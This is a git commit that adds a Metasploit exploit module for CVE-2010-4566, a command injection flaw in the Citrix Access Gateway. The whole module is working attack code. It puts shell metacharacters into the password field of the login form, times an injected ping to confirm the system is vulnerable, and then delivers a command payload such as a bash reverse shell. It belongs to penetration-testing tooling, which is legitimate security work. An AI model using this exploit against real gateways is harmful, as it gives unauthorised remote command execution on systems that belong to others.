add cve-2010-4566 exploit from Erwin Paternotte

git-svn-id: file:///home/svn/framework3/trunk@11873 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2011-03-03 20:51:12 +00:00
parent 657c7c55a9
commit d682069aec
1 changed files with 117 additions and 0 deletions

View File

@ -0,0 +1,117 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix Access Gateway Command Execution',
'Description' => %q{
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
metacharacters in the web authentication form it is possible to execute
arbitrary commands on the Access Gateway.
},
'Author' =>
[
'George D. Gal', # Original advisory
'Erwin Paternotte', # Exploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-4566' ],
[ 'OSVDB', '70099' ],
[ 'BID', '45402' ],
[ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 127,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic telnet bash-tcp'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Dec 21 2010',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [ true, 'Use SSL', true ]),
], self.class)
end
def post(command, background)
username = rand_text_alphanumeric(20)
if background
sploit = Rex::Text.uri_encode('|' + command + '&')
else
sploit = Rex::Text.uri_encode('|' + command)
end
data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
data << username
data << "&password="
data << sploit
res = send_request_cgi({
'uri' => '/',
'method' => 'POST',
'data' => data
}, 25)
end
def check
print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now
post("ping -c 10 127.0.0.1", false)
elapsed = Time.now - start
if elapsed >= 3
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
cmd = payload.encoded
if not post(cmd, true)
raise RuntimeError, "Unable to execute the desired command"
end
end
end